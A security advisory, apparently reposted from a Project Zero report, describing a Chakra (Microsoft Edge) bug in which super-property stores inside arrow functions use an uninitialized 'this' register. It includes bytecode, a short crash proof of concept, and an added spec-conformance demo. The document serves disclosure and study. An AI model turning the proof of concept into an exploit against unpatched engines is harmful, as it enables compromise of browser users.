Microsoft Edge Chakra EmitAssignment uses the 'this' Register Without Initializing

2017.08.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

"EmitAssignment" doesn't call "EmitSuperMethodBegin", the routine that initializes the "this" register, for the case where the assignment target is a super property reference (super.x = v). Inside an arrow function in a derived-class constructor, super.x = v has to use the enclosing constructor's "this" as the receiver of the store, so that binding must be loaded into the "this" register before the store is emitted. Here's the generated bytecode for the lambda function in the PoC. The home object (R4) and its prototype (R8) are loaded, but R5, the receiver operand of ProfiledStSuperFld, is never written: it is uninitialized when the store executes. Note also that the PoC's constructor never calls super(), so under the language semantics the store should fail with a ReferenceError for an uninitialized "this"; the emitted code performs no such load or check and simply consumes whatever R5 holds.

    Function Anonymous function ( (#1.3), #4) (In0) (size: 7 [7])
          9 locals (1 temps from R8), 1 inline cache
        Constant Table:
        ======== =====
         R1 LdRoot
         R2 Ld_A (undefined)
         R3 LdC_A_I4 int:1

        0000   ProfiledLdEnvSlot    R6 = [1][4] <0>
        000c   ProfiledLdEnvSlot    R4 = [1][3] <1>
      Line  28: super.a = 1;
      Col   13: ^
        0018   LdHomeObjProto       R8 R4
        001d   ProfiledStSuperFld   R8.(this=R5) = R3 #0 <0>
        0025   LdUndef              R0
      Line  29: }
      Col    9: ^
        0027   Ret

PoC:

    class Parent {
    };

    class Child extends Parent {
        constructor() {
            (() => {
                super.a = 10;  // Implicitly use the "this" register. So it must be initialized.
            })();
        }
    };

    new Child();
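The following is an added example, not code from the Project Zero report or from Chakra, showing the receiver semantics the bytecode emitter has to honor for the PoC's pattern: super.a = v inside an arrow function is a [[Set]] on the home object's prototype with the enclosing constructor's "this" as receiver (the register the report calls R5), and it must fail with a ReferenceError if super() has not yet initialized that binding. The setter-based Parent class and the helper names (runSuperStore, runDirectStore, seen) are constructed for the demonstration and assume a spec-conforming engine such as Node.js.

```javascript
'use strict';

// Constructed example (not from the original report). Parent's setter records
// which receiver each `super.a = v` store is delivered to, so we can observe
// that the receiver is the derived instance, i.e. the constructor's `this`.
const seen = [];

class Parent {
  set a(v) { seen.push({ receiver: this, value: v }); }
}

// Build a Child whose constructor performs `super.a = 10` from inside an arrow
// function, exactly as the PoC does. callSuperFirst controls whether `this`
// has been initialized by super() before the store runs.
function runSuperStore(callSuperFirst) {
  seen.length = 0;
  class Child extends Parent {
    constructor() {
      if (callSuperFirst) super();
      // The arrow has no `this` of its own; the receiver of the store is the
      // constructor's `this` binding, which the emitter must load (and which
      // must already be initialized) before emitting the store.
      (() => { super.a = 10; })();
    }
  }
  try {
    const c = new Child();
    return {
      error: null,
      receiverIsInstance: seen.length === 1 && seen[0].receiver === c,
      value: seen.length === 1 ? seen[0].value : undefined,
    };
  } catch (e) {
    // Without a prior super() a conforming engine throws ReferenceError at the
    // store, before the setter ever runs; `seen` stays empty.
    return { error: e.constructor.name, receiverIsInstance: false, value: undefined };
  }
}

// The same store written directly in the constructor body, for comparison with
// the arrow form the report exercises: the receiver must be the same instance.
function runDirectStore() {
  seen.length = 0;
  class Child extends Parent {
    constructor() { super(); super.a = 10; }
  }
  const c = new Child();
  return seen.length === 1 && seen[0].receiver === c && seen[0].value === 10;
}

if (typeof module !== 'undefined' && require.main === module) {
  console.log(runSuperStore(true));   // store delivered with the instance as receiver
  console.log(runSuperStore(false));  // ReferenceError: `this` not yet initialized
  console.log(runDirectStore());      // same receiver as the arrow form
}
```

Running this under a conforming engine is a useful baseline when checking an engine's handling of super property stores in nested arrow functions: the receiver recorded by the setter must be the constructed instance, and the variant without super() must throw rather than reach the setter.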

References:

https://bugs.chromium.org/p/project-zero/issues/detail?id=1283


Copyright 2017, cxsecurity.com